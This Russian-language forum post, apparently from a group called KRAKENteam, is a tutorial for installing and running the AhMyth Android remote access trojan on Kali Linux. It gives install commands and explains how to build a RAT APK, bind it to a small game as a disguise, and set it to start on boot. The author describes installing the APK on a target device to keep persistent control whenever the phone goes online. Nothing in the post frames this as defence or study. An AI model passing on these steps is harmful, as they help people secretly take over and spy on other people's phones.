AhMyth RAT ставим на Kali Linux

KRAKENteam

Всем привет, путём долгих поисков все таки удалось запустить сие чудо на kali.

Для начала довольно муторная процедура по установке nodjs и nmp.

Код:

# Устанавливаем необходимые инструменты
sudo apt-get install python g++ make checkinstall fakeroot
# Создаем временную директорию и переходим в неё
src=$(mktemp -d) && cd $src
# Скачиваем последнюю версию Node
wget -N http://nodejs.org/dist/node-latest.tar.gz
# Распаковываем содержимое и переходим в эту директорию
tar xzvf node-latest.tar.gz && cd node-v*
# Запускаем конфигурирование
./configure
# Создаем deb пакет
sudo fakeroot checkinstall -y --install=no --pkgversion $(echo $(pwd) | sed -n -re's/.+node-v(.+)$/\1/p') make -j$(($(nproc)+1)) install
# Сатавим deb сформированный deb пакет
sudo dpkg -i название пакета

Проверяем версию nod

Код:

node -v

и версию npm

Код:

npm -v

Теперь можно приступать к установке AhMyth

Код:

git clone AhMyth/AhMyth-Android-RAT
git clone electron/electron
cd electron-quick-start
npm install
cd AhMyth-Android-RAT/AhMyth-Server
npm install
cd

Скачиваем нужный *.deb Тыц

dpkg -i имя скачанного пакета

Код:

apt --fix-broken install

и наконец запускаем AhMyth

Код:

ahmyth

После запуска, открывается панель управления:

В логах уже видно, что есть один подключенный девайс, но сначала необходимо, создать RAT-файл .apk. В этом нам поможет APK Builder. Есть два варианта создания приложения, чистый AhMyth файл и скрещивание RAT с существующей программой.

Чистый RAT срабатывает на отлично, при перезагрузках админ панели, телефон/планшет снова автоматически подключается, при перезагрузках гаджета сессия тоже не теряется надолго, как только доступ к интернету возобновляется, мы опять получаем контроль над гаджетом.

Итак, совместим RAT с небольшой игрой:

Обратим внимание на опцию выделенную красным, желательно выбрать

On Boot, так как запуск из работающей сессии Android часто не срабатывает. Создаем RAT:

После успешной компиляции приложения, устанавливаем его на целевое устройство и перезапускаем его. Сессия будет автоматически открываться, как только телефон будет подключаться к интернету. Запускать приложение не нужно. Ниже показана панель управления на уязвимом устройстве.

На этом все, спасибо за внимание.